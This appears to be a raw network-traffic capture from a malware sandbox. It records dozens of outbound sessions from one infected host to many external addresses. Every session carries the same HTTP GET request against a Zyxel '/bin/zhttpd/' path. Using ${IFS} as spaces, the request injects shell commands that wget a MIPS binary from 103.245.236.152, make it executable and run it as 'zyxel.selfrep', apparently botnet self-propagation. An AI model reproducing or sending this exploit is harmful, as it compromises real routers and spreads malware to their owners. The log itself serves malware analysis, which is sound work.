                                            Jan 14, 2024 15:50:39.412072897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4206192.168.2.2349342202.5.96.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412120104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4207192.168.2.2335750148.13.240.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412147045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4208192.168.2.235392234.102.131.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412188053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4209192.168.2.2353020162.183.104.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412198067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4210192.168.2.233431686.106.29.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412244081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4211192.168.2.2342274147.205.194.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412269115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4212192.168.2.2344472208.73.93.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412292004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4213192.168.2.235127293.246.73.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412343025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4214192.168.2.2352722207.249.206.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412362099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4215192.168.2.2356716155.137.135.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412401915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4216192.168.2.2333456186.55.200.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412426949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4217192.168.2.2355750158.104.127.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412426949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4218192.168.2.2339678155.187.184.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412448883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4219192.168.2.234903689.38.134.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412481070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4220192.168.2.2335460210.145.78.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412539005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4221192.168.2.235407082.186.54.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412553072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4222192.168.2.234098813.251.104.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412590981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4223192.168.2.2344738171.124.81.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412597895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4224192.168.2.2338624111.112.93.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412630081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4225192.168.2.235954699.12.27.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412683964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4226192.168.2.234478266.207.195.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412688971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4227192.168.2.2358254123.242.115.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412712097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4228192.168.2.233624850.55.226.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412750006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4229192.168.2.234580612.93.140.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412764072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4230192.168.2.235508437.61.187.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412800074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4231192.168.2.2333496116.96.2.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412847996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4232192.168.2.2351190135.69.14.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412857056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4233192.168.2.2353508152.46.13.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412888050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4234192.168.2.236096881.167.31.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412902117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4235192.168.2.235389299.248.182.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412955999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4236192.168.2.234054267.34.253.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.412997007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4237192.168.2.2335510128.104.168.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413012981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4238192.168.2.233578017.98.134.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413033962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4239192.168.2.233873220.137.176.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413070917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4240192.168.2.234967874.27.58.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413091898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4241192.168.2.2357390107.150.40.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413116932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4242192.168.2.2333876126.155.58.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413160086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4243192.168.2.2345628106.29.150.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413181067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4244192.168.2.2360182130.245.2.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413217068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4245192.168.2.235289817.155.117.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413234949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4246192.168.2.2354550195.36.202.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413291931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4247192.168.2.2359508143.200.29.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413306952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4248192.168.2.2336584186.81.158.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413326979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4249192.168.2.2358584101.142.161.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413362980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4250192.168.2.2342842112.24.38.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413383961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4251192.168.2.2360162189.114.158.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413429022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4252192.168.2.2356188121.97.85.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413435936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4253192.168.2.235818265.139.72.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413461924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4254192.168.2.2359646100.28.104.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413464069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4255192.168.2.233492235.230.16.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413492918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4256192.168.2.234137232.143.12.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413547039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4257192.168.2.2346662133.136.34.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413568974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4258192.168.2.2350824148.250.155.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413614988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4259192.168.2.234716888.216.169.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413620949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4260192.168.2.233293038.233.40.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413651943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4261192.168.2.2341448101.190.255.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413677931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4262192.168.2.233860288.127.198.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413691998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4263192.168.2.234543040.116.53.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413728952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4264192.168.2.2349096172.245.181.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413750887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4265192.168.2.2341092146.75.133.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413794041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4266192.168.2.235154690.186.173.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413835049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4267192.168.2.233636445.43.201.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:39.413857937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4268192.168.2.23404282.221.137.195443
                                            TimestampBytes transferredDirectionData
